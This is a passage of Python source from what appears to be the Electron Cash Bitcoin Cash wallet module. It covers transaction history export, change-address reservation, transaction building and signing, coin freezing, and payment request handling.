class MissingTx(RuntimeError):
''' Can happen in rare circumstances if wallet history is being
radically reorged by network thread while we are in this code. '''
def get_tx(tx_hash):
''' Try to get a tx from wallet, then from the Transaction class
cache if that fails. In either case it deserializes the copy and
puts the deserialized tx in local stack dict local_tx_cache. The
reason we don't deserialize the tx's from self.transactions is that
we do not want to keep deserialized tx's in memory. The
self.transactions dict should contain just raw tx's (not
deserialized). Deserialized tx's eat on the order of 10x the memory
because of the Python lists, dicts, etc. they contain, per
instance. '''
tx = local_tx_cache.get(tx_hash)
if tx:
return tx
tx = Transaction.tx_cache_get(tx_hash)
if not tx:
tx = copy.deepcopy(self.transactions.get(tx_hash))
if tx:
tx.deserialize()
local_tx_cache[tx_hash] = tx
else:
raise MissingTx(f'txid {tx_hash} dropped out of wallet history while exporting')
return tx
def try_calc_fee(tx_hash):
''' Try to calc fee from cheapest to most expensive calculation.
Ultimately asks the transaction class to look at prevouts in wallet and uses
that scheme as a last (more CPU intensive) resort. '''
fee = self.tx_fees.get(tx_hash)
if fee is not None:
return fee
def do_get_fee(tx_hash):
tx = get_tx(tx_hash)
def try_get_fee(tx):
try: return tx.get_fee()
except InputValueMissing: pass
fee = try_get_fee(tx)
t_remain = time_remaining()
if fee is None and t_remain:
q = queue.Queue()
def done():
q.put(1)
tx.fetch_input_data(self, use_network=bool(download_inputs), done_callback=done)
try: q.get(timeout=t_remain)
except queue.Empty: pass
fee = try_get_fee(tx)
return fee
fee = do_get_fee(tx_hash)
if fee is not None:
self.tx_fees[tx_hash] = fee # save fee to wallet if we bothered to dl/calculate it.
return fee
def fmt_amt(v, is_diff):
if v is None:
return '--'
return format_satoshis(v, decimal_point=decimal_point,
is_diff=is_diff)
# grab history
h = self.get_history(domain, reverse=True)
out = []
n, l = 0, max(1, float(len(h)))
for tx_hash, height, conf, timestamp, value, balance in h:
if progress_callback:
progress_callback(n/l)
n += 1
timestamp_safe = timestamp
if timestamp is None:
timestamp_safe = time.time() # set it to "now" so below code doesn't explode.
if from_timestamp and timestamp_safe < from_timestamp:
continue
if to_timestamp and timestamp_safe >= to_timestamp:
continue
try:
fee = try_calc_fee(tx_hash)
except MissingTx as e:
self.print_error(str(e))
continue
item = {
'txid' : tx_hash,
'height' : height,
'confirmations' : conf,
'timestamp' : timestamp_safe,
'value' : fmt_amt(value, is_diff=True),
'fee' : fmt_amt(fee, is_diff=False),
'balance' : fmt_amt(balance, is_diff=False),
}
if item['height'] > 0:
date_str = format_time(timestamp) if timestamp is not None else _("unverified")
else:
date_str = _("unconfirmed")
item['date'] = date_str
try:
# Defensive programming.. sanitize label.
# The below ensures strings are utf8-encodable. We do this
# as a paranoia measure.
item['label'] = self.get_label(tx_hash).encode(encoding='utf-8', errors='replace').decode(encoding='utf-8', errors='replace')
except UnicodeError:
self.print_error(f"Warning: could not export label for {tx_hash}, defaulting to ???")
item['label'] = "???"
if show_addresses:
tx = get_tx(tx_hash)
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
if addr is None: continue
input_addresses.append(addr.to_ui_string())
for _type, addr, v in tx.outputs():
output_addresses.append(addr.to_ui_string())
item['input_addresses'] = input_addresses
item['output_addresses'] = output_addresses
if fx is not None:
date = timestamp_to_datetime(timestamp_safe)
item['fiat_value'] = fx.historical_value_str(value, date)
item['fiat_balance'] = fx.historical_value_str(balance, date)
item['fiat_fee'] = fx.historical_value_str(fee, date)
out.append(item)
if progress_callback:
progress_callback(1.0) # indicate done, just in case client code expects a 1.0 in order to detect completion
return out
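# Usage sketch for export_history() ('wallet' is hypothetical; progress is
# printed to stdout here):
#
#   rows = wallet.export_history(show_addresses=True,
#                                fee_calc_timeout=10.0, download_inputs=False,
#                                progress_callback=lambda p: print(f'{p:.0%}'))
#   # each row is a dict with 'txid', 'height', 'confirmations', 'timestamp',
#   # 'value', 'fee', 'balance', 'date', 'label', and optionally address/fiat fields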
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
if not label:
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if not self.txi.get(tx_hash):
d = self.txo.get(tx_hash, {})
labels = []
for addr in list(d.keys()): # use a copy to avoid possibility of dict changing during iteration, see #1328
label = self.labels.get(addr.to_storage_string())
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
return 3, 'unknown'
fee = self.tx_fees.get(tx_hash)
# we disable fee estimates in BCH for now.
#if fee and self.network and self.network.config.has_fee_estimates():
# size = len(tx.raw)/2
# low_fee = int(self.network.config.dynfee(0)*size/1000)
# is_lowfee = fee < low_fee * 0.5
#else:
# is_lowfee = False
# and instead, if it's less than 1.0 sats/B, we flag it as low fee
try:
# NB len(tx.raw) is 2x the byte size as it's hex encoded.
is_lowfee = int(fee) / (int(len(tx.raw)) / 2.0) < 1.0 # if less than 1.0 sats/B, complain. otherwise don't.
except (TypeError, ValueError): # If for some reason fee was None or invalid, just pass on through.
is_lowfee = False
# /
if height < 0:
status = 0
elif height == 0 and is_lowfee:
status = 1
elif height == 0:
status = 2
else:
status = 3
else:
status = 3 + min(conf, 6)
time_str = format_time(timestamp) if timestamp else _("unknown")
status_str = _(TX_STATUS[status]) if status < 4 else time_str
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def reserve_change_addresses(self, count, temporary=False):
""" Reserve and return `count` change addresses. In order
of preference, this will return from:
1. addresses 'freed' by `.unreserve_change_address`,
2. addresses in the last 20 (gap limit) of the change list,
3. newly-created addresses.
Of these, only unlabeled, unreserved addresses with no usage history
will be returned. If you pass temporary=False (default), this will
persist upon wallet saving, otherwise with temporary=True the address
will be made available again once the wallet is re-opened.
On non-deterministic wallets, this returns an empty list.
"""
if count <= 0 or not hasattr(self, 'create_new_address'):
return []
with self.lock:
last_change_addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if not last_change_addrs:
# this happens in non-deterministic wallets but the above
# hasattr check should have caught those.
return []
def gen_change():
try:
while True:
yield self.change_unreserved.pop(0)
except IndexError:
pass
for addr in last_change_addrs:
yield addr
while True:
yield self.create_new_address(for_change=True)
result = []
for addr in gen_change():
if ( addr in self.change_reserved
or addr in self.change_reserved_tmp
or self.get_num_tx(addr) != 0
or addr in result):
continue
addr_str = addr.to_storage_string()
if self.labels.get(addr_str):
continue
result.append(addr)
if temporary:
self.change_reserved_tmp.add(addr)
else:
self.change_reserved.add(addr)
if len(result) >= count:
return result
raise RuntimeError("Unable to generate new addresses") # should not happen
def unreserve_change_address(self, addr):
""" Unreserve an addr that was set by reserve_change_addresses, and
also explicitly reschedule this address to be usable by a future
reservation. Unreserving is appropriate when the address was never
actually shared or used in a transaction, and reduces empty gaps in
the change list.
"""
assert addr in self.get_change_addresses()
with self.lock:
self.change_reserved.discard(addr)
self.change_reserved_tmp.discard(addr)
self.change_unreserved.append(addr)
def get_default_change_addresses(self, count):
""" Return `count` change addresses from the default reserved list,
ignoring and removing used addresses. Reserves more as needed.
The same default change addresses keep getting repeated until they are
actually seen as used in a transaction from the network. Theoretically
this could hurt privacy if the user has multiple unsigned transactions
open at the same time, but practically this avoids address gaps for
normal usage. If you need non-repeated addresses, see
`reserve_change_addresses`.
On non-deterministic wallets, this returns an empty list.
"""
result = []
with self.lock:
for addr in list(self.change_reserved_default):
if len(result) >= count:
break
if self.get_num_tx(addr) != 0:
self.change_reserved_default.remove(addr)
continue
result.append(addr)
need_more = count - len(result)
if need_more > 0:
new_addrs = self.reserve_change_addresses(need_more)
self.change_reserved_default.extend(new_addrs)
result.extend(new_addrs)
return result
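# Reservation-lifecycle sketch ('wallet' is hypothetical):
#
#   addrs = wallet.reserve_change_addresses(2, temporary=True)  # freed again on wallet reopen
#   # ... the user cancels the transaction ...
#   for a in addrs:
#       wallet.unreserve_change_address(a)   # make them available to future reservations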
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None):
''' sign_schnorr flag controls whether to mark the tx as signing with
schnorr or not. Specify either a bool, or set the flag to 'None' to use
whatever the wallet is configured to use from the GUI '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info(item)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
change_addrs = []
if change_addr:
change_addrs = [change_addr]
else:
# Currently the only code that uses this hook is the deprecated
# Cash Shuffle plugin
change_addrs = run_hook("get_change_addrs", self) or []
if not change_addrs:
# hook gave us nothing, so find a change addr from the change
# reservation subsystem
max_change = self.max_change_outputs if self.multiple_change else 1
if self.use_change:
change_addrs = self.get_default_change_addresses(max_change)
else:
change_addrs = []
if not change_addrs:
# For some reason we couldn't get any autogenerated change
# address (non-deterministic wallet?). So, try to find an
# input address that belongs to us.
for inp in inputs:
backup_addr = inp['address']
if self.is_mine(backup_addr):
change_addrs = [backup_addr]
break
else:
# ok, none of the inputs are "mine" (why?!) -- fall back
# to picking first max_change change_addresses that have
# no history
change_addrs = []
for addr in self.get_change_addresses()[-self.gap_limit_for_change:]:
if self.get_num_tx(addr) == 0:
change_addrs.append(addr)
if len(change_addrs) >= max_change:
break
if not change_addrs:
# No unused wallet addresses or no change addresses.
# Fall back to picking ANY wallet address
try:
# Pick a random address
change_addrs = [random.choice(self.get_addresses())]
except IndexError:
change_addrs = [] # Address-free wallet?!
# This should never happen
if not change_addrs:
raise RuntimeError("Can't find a change address!")
assert all(isinstance(addr, Address) for addr in change_addrs)
coin_chooser = coinchooser.CoinChooserPrivacy()
tx = coin_chooser.make_tx(inputs, outputs, change_addrs,
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr)
else:
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
        tx_in_bytes = tx.estimated_size()
        fee_in_satoshis = tx.get_fee()
        sats_per_byte = fee_in_satoshis / tx_in_bytes
        if sats_per_byte > 50:
raise ExcessiveFee()
# Sort the inputs and outputs deterministically
tx.BIP_LI01_sort()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
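    # Illustrative sketch of the "spend max" convention handled above
    # (assumptions: `wallet`, `config` and `dest_addr` are a loaded wallet, a
    # config object and an Address; TYPE_ADDRESS is the output-type constant
    # used elsewhere in this codebase):
    #
    #   coins = wallet.get_spendable_coins(None, config)
    #   outputs = [(TYPE_ADDRESS, dest_addr, '!')]   # '!' means "spend max"
    #   tx = wallet.make_unsigned_transaction(coins, outputs, config)
    #   wallet.sign_transaction(tx, password)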
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None, sign_schnorr=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr, sign_schnorr=sign_schnorr)
self.sign_transaction(tx, password)
return tx
def is_frozen(self, addr):
""" Address-level frozen query. Note: this is set/unset independent of
'coin' level freezing. """
assert isinstance(addr, Address)
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo: Union[str, dict, Set[str]]) -> Union[bool, Set[str]]:
""" 'coin' level frozen query. Note: this is set/unset independent of
address-level freezing.
`utxo` is a prevout:n string, or a dict as returned from get_utxos(),
in which case a bool is returned.
`utxo` may also be a set of prevout:n strings in which case a set is
returned which is the intersection of the internal frozen coin sets
and the `utxo` set. """
assert isinstance(utxo, (str, dict, set))
if isinstance(utxo, dict):
name = ("{}:{}".format(utxo['prevout_hash'], utxo['prevout_n']))
ret = name in self.frozen_coins or name in self.frozen_coins_tmp
if ret != utxo['is_frozen_coin']:
self.print_error("*** WARNING: utxo has stale is_frozen_coin flag", name)
utxo['is_frozen_coin'] = ret # update stale flag
return ret
elif isinstance(utxo, set):
# set is returned
return (self.frozen_coins | self.frozen_coins_tmp) & utxo
else:
return utxo in self.frozen_coins or utxo in self.frozen_coins_tmp
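    # Illustrative sketch of the three accepted input shapes (hypothetical
    # values; `wallet` is a loaded wallet instance):
    #
    #   wallet.is_frozen_coin("aa..ff:0")                  # str  -> bool
    #   wallet.is_frozen_coin(utxo_dict)                   # dict -> bool (stale flag refreshed)
    #   wallet.is_frozen_coin({"aa..ff:0", "bb..11:3"})    # set  -> frozen subset of the set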
def set_frozen_state(self, addrs, freeze):
"""Set frozen state of the addresses to `freeze`, True or False. Note
that address-level freezing is set/unset independent of coin-level
freezing, however both must be satisfied for a coin to be defined as
spendable."""
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
frozen_addresses = [addr.to_storage_string()
for addr in self.frozen_addresses]
self.storage.put('frozen_addresses', frozen_addresses)
return True
return False
def set_frozen_coin_state(self, utxos, freeze, *, temporary=False):
"""Set frozen state of the `utxos` to `freeze`, True or False. `utxos`
is a (possibly mixed) list of either "prevout:n" strings and/or
coin-dicts as returned from get_utxos(). Note that if passing prevout:n
strings as input, 'is_mine()' status is not checked for the specified
coin. Also note that coin-level freezing is set/unset independent of
address-level freezing, however both must be satisfied for a coin to be
defined as spendable.
The `temporary` flag only applies if `freeze = True`. In that case,
freezing coins will only affect the in-memory-only frozen set, which
doesn't get saved to storage. This mechanism was added so that plugins
(such as CashFusion) have a mechanism for ephemeral coin freezing that
doesn't persist across sessions.
        Note that setting `freeze = False` effectively unfreezes both the
        temporary and the permanent frozen coin sets all in one call. Thus after
        a call to `set_frozen_coin_state(utxos, False)`, both the temporary and
        the persistent frozen sets are cleared of all coins in `utxos`."""
add_set = self.frozen_coins if not temporary else self.frozen_coins_tmp
def add(utxo):
add_set.add(utxo)
def discard(utxo):
self.frozen_coins.discard(utxo)
self.frozen_coins_tmp.discard(utxo)
apply_operation = add if freeze else discard
original_size = len(self.frozen_coins)
with self.lock:
ok = 0
for utxo in utxos:
if isinstance(utxo, str):
apply_operation(utxo)
ok += 1
elif isinstance(utxo, dict):
# Note: we could do an is_mine check here for each coin dict here,
# but since all code paths leading to this branch always pass valid
# coins that are "mine", we removed the check to save CPU cycles.
#
# So an O(M logN) algorithm becomes O(M) without the is_mine check,
# where M = number of coins and N = number of addresses.
txo = "{}:{}".format(utxo['prevout_hash'], utxo['prevout_n'])
apply_operation(txo)
utxo['is_frozen_coin'] = bool(freeze)
ok += 1
if original_size != len(self.frozen_coins):
# Performance optimization: only set storage if the perma-set
# changed.
self.storage.put('frozen_coins', list(self.frozen_coins))
return ok
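    # Illustrative sketch of ephemeral vs. persistent coin freezing (the
    # `wallet` and `utxos` names are hypothetical):
    #
    #   wallet.set_frozen_coin_state(utxos, True, temporary=True)   # in-memory only
    #   wallet.set_frozen_coin_state(utxos, True)                   # saved to storage
    #   wallet.set_frozen_coin_state(utxos, False)                  # clears both sets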
def prepare_for_verifier(self):
# review transactions that are in the history
for addr, hist in self._history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if we are on a pruning server, remove unverified transactions
with self.lock:
vr = list(self.verified_tx.keys()) + list(self.unverified_tx.keys())
for tx_hash in list(self.transactions):
if tx_hash not in vr:
self.print_error("removing transaction", tx_hash)
self.transactions.pop(tx_hash)
def start_threads(self, network):
self.network = network
if self.network:
self.start_pruned_txo_cleaner_thread()
self.prepare_for_verifier()
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
finalization_print_error(self.verifier)
finalization_print_error(self.synchronizer)
network.add_jobs([self.verifier, self.synchronizer])
            self.cashacct.start(self.network)  # start cashacct network-dependent subsystem, network.add_jobs, etc
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
if self.network:
            # Note: synchronizer and verifier will remove themselves from the
# network thread the next time they run, as a result of the below
# release() calls.
# It is done this way (as opposed to an immediate clean-up here)
            # because these objects need to do their clean-up actions in a
# thread-safe fashion from within the thread where they normally
# operate on their data structures.
self.cashacct.stop()
self.synchronizer.release()
self.verifier.release()
self.synchronizer = None
self.verifier = None
self.stop_pruned_txo_cleaner_thread()
            # Now no references to the synchronizer or verifier
            # remain, so they will be GC-ed
self.storage.put('stored_height', self.get_local_height())
self.save_network_state()
def save_network_state(self):
"""Save all the objects which are updated by the network thread. This is called
periodically by the Android app during long synchronizations.
"""
with self.lock:
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.put('frozen_coins', list(self.frozen_coins))
self.save_change_reservations()
self.storage.write()
def start_pruned_txo_cleaner_thread(self):
self.pruned_txo_cleaner_thread = threading.Thread(target=self._clean_pruned_txo_thread, daemon=True, name='clean_pruned_txo_thread')
self.pruned_txo_cleaner_thread.q = queue.Queue()
self.pruned_txo_cleaner_thread.start()
def stop_pruned_txo_cleaner_thread(self):
t = self.pruned_txo_cleaner_thread
self.pruned_txo_cleaner_thread = None # this also signals a stop
if t and t.is_alive():
t.q.put(None) # signal stop
# if the join times out, it's ok. it means the thread was stuck in
# a network call and it will eventually exit.
t.join(timeout=3.0)
def wait_until_synchronized(self, callback=None, *, timeout=None):
tstart = time.time()
def check_timed_out():
if timeout is not None and time.time() - tstart > timeout:
raise TimeoutException()
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
check_timed_out()
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
check_timed_out()
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
return self.get_address_history(address) and self.is_empty(address)
def is_empty(self, address):
assert isinstance(address, Address)
return not any(self.get_addr_balance(address))
def address_is_old(self, address, age_limit=2):
age = -1
local_height = self.get_local_height()
for tx_hash, tx_height in self.get_address_history(address):
if tx_height == 0:
tx_age = 0
else:
tx_age = local_height - tx_height + 1
if tx_age > age:
age = tx_age
if age > age_limit:
                break  # ok, it's old. No need to keep looping
return age > age_limit
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# Bitcoin Cash needs value to sign
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
# setup "wallet advice" so Xpub wallets know how to sign 'fd' type tx inputs
# by giving them the sequence number ahead of time
if isinstance(k, BIP32_KeyStore):
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
_, addr = xpubkey_to_address(x_pubkey)
try:
c, index = self.get_address_index(addr)
except:
continue
if index is not None:
k.set_wallet_advice(addr, [c,index])
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash)
if not tx and self.network:
request = ('blockchain.transaction.get', [tx_hash])
tx = Transaction(self.network.synchronous_get(request))
return tx
def add_input_values_to_tx(self, tx):
""" add input values to the tx, for signing"""
for txin in tx.inputs():
if 'value' not in txin:
inputtx = self.get_input_tx(txin['prevout_hash'])
if inputtx is not None:
out_zero, out_addr, out_val = inputtx.outputs()[txin['prevout_n']]
txin['value'] = out_val
txin['prev_tx'] = inputtx # may be needed by hardware wallets
def add_hw_info(self, tx):
# add previous tx for hw wallets, if needed and not already there
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx) and k.needs_prevtx()) for k in self.get_keystores()]):
for txin in tx.inputs():
if 'prev_tx' not in txin:
txin['prev_tx'] = self.get_input_tx(txin['prevout_hash'])
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_change(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None, self.txin_type
tx.output_info = info
def sign_transaction(self, tx, password, *, use_cache=False):
""" Sign a transaction, requires password (may be None for password-less
wallets). If `use_cache` is enabled then signing will be much faster.
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Warning: If you modify non-signature parts of the transaction
afterwards, do not use `use_cache`! """
if self.is_watching_only():
return
# add input values for signing
self.add_input_values_to_tx(tx)
# hardware wallets require extra info
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign
for k in self.get_keystores():
try:
if k.can_sign(tx):
k.sign_transaction(tx, password, use_cache=use_cache)
except UserCancelled:
continue
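    # Illustrative sketch of the signing-cache note in the docstring above
    # (hypothetical names):
    #
    #   tx = wallet.make_unsigned_transaction(coins, outputs, config)
    #   wallet.sign_transaction(tx, password, use_cache=True)  # OK: tx is not modified afterwards
    #   # ...but if you later edit outputs/locktime, re-sign WITHOUT use_cache.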
def get_unused_addresses(self, *, for_change=False, frozen_ok=True):
# fixme: use slots from expired requests
with self.lock:
domain = self.get_receiving_addresses() if not for_change else (self.get_change_addresses() or self.get_receiving_addresses())
return [addr for addr in domain
if not self.get_address_history(addr)
and addr not in self.receive_requests
and (frozen_ok or addr not in self.frozen_addresses)]
def get_unused_address(self, *, for_change=False, frozen_ok=True):
addrs = self.get_unused_addresses(for_change=for_change, frozen_ok=frozen_ok)
if addrs:
return addrs[0]
def get_receiving_address(self, *, frozen_ok=True):
'''Returns a receiving address or None.'''
domain = self.get_unused_addresses(frozen_ok=frozen_ok)
if not domain:
domain = [a for a in self.get_receiving_addresses()
if frozen_ok or a not in self.frozen_addresses]
if domain:
return domain[0]
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = local_height - tx_height
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def has_payment_request(self, addr):
''' Returns True iff Address addr has any extant payment requests
(even if expired), False otherwise. '''
assert isinstance(addr, Address)
return bool(self.receive_requests.get(addr))
def get_payment_request(self, addr, config):
assert isinstance(addr, Address)
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
addr_text = addr.to_ui_string()
amount_text = format_satoshis(r['amount'])
out['URI'] = '{}:{}?amount={}'.format(networks.net.CASHADDR_PREFIX,
addr_text, amount_text)
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr.to_storage_string())
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
baseurl = baseurl.replace(*rewrite)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
                if 'index_url' not in out:
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
expiration = r.get('exp')
if expiration and type(expiration) != int:
expiration = 0
conf = None
if amount:
paid, conf = self.get_payment_status(address, amount)
status = PR_PAID if paid else PR_UNPAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
return status, conf
def make_payment_request(self, addr, amount, message, expiration=None, *,
op_return=None, op_return_raw=None, payment_url=None, index_url=None):
assert isinstance(addr, Address)
if op_return and op_return_raw:
raise ValueError("both op_return and op_return_raw cannot be specified as arguments to make_payment_request")
timestamp = int(time.time())
_id = bh2u(Hash(addr.to_storage_string() + "%d" % timestamp))[0:10]
d = {
'time': timestamp,
'amount': amount,
'exp': expiration,
'address': addr,
'memo': message,
'id': _id
}
if payment_url:
d['payment_url'] = payment_url + "/" + _id
if index_url:
d['index_url'] = index_url + "/" + _id
if op_return:
d['op_return'] = op_return
if op_return_raw:
d['op_return_raw'] = op_return_raw
return d
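    # Illustrative sketch of the request dict produced above and how it is
    # typically consumed (hypothetical `wallet`, `addr` and `config` values):
    #
    #   req = wallet.make_payment_request(addr, 10000, "invoice #1", expiration=3600)
    #   # req ~ {'time': ..., 'amount': 10000, 'exp': 3600, 'address': addr,
    #   #        'memo': 'invoice #1', 'id': '<10 hex chars>'}
    #   wallet.add_payment_request(req, config)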
def serialize_request(self, r):
result = r.copy()
result['address'] = r['address'].to_storage_string()
return result
def save_payment_requests(self, write=True):
def delete_address(value):
del value['address']
return value
requests = {addr.to_storage_string() : delete_address(value.copy())
for addr, value in self.receive_requests.items()}
self.storage.put('payment_requests', requests)
self.save_labels() # In case address labels were set or cleared.
if write:
self.storage.write()
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = to_string(pr.pki_data)
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.save_payment_requests()
def add_payment_request(self, req, config, set_address_label=True, save=True):
addr = req['address']
addr_text = addr.to_storage_string()
amount = req['amount']
message = req['memo']
self.receive_requests[addr] = req
if save:
self.save_payment_requests()
if set_address_label:
self.set_label(addr_text, message, save=save) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr_text)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
req['address'] = req['address'].to_ui_string()
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
def remove_payment_request(self, addr, config, clear_address_label_if_no_tx=True,
save=True):
if isinstance(addr, str):
addr = Address.from_string(addr)
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
if clear_address_label_if_no_tx and not self.get_address_history(addr):
memo = r.get('memo')
# clear it only if the user didn't overwrite it with something else
if memo and memo == self.labels.get(addr.to_storage_string()):
self.set_label(addr, None, save=save)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr.to_storage_string())
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
if save:
self.save_payment_requests()
return True
def get_sorted_requests(self, config):
m = map(lambda x: self.get_payment_request(x, config), self.receive_requests.keys())
try:
            def f(x):
                addr = x.get('address')  # avoid a NameError in the except clause below
                try:
                    return self.get_address_index(addr) or addr
                except:
                    return addr
return sorted(m, key=f)
except TypeError:
# See issue #1231 -- can get inhomogenous results in the above
# sorting function due to the 'or addr' possible return.
# This can happen if addresses for some reason drop out of wallet
# while, say, the history rescan is running and it can't yet find
# an address index for an address. In that case we will
# return an unsorted list to the caller.
return list(m)
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def is_multisig(self):
# Subclass Multisig_Wallet overrides this
return False
def is_hardware(self):
return any([isinstance(k, Hardware_KeyStore) for k in self.get_keystores()])
def add_address(self, address):
assert isinstance(address, Address)
self._addr_bal_cache.pop(address, None) # paranoia, not really necessary -- just want to maintain the invariant that when we modify address history below we invalidate cache.
self.invalidate_address_set_cache()
if address not in self._history:
self._history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
self.cashacct.on_address_addition(address)
def has_password(self):
return self.storage.get('use_encryption', False)
def check_password(self, password):
self.keystore.check_password(password)
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def rebuild_history(self):
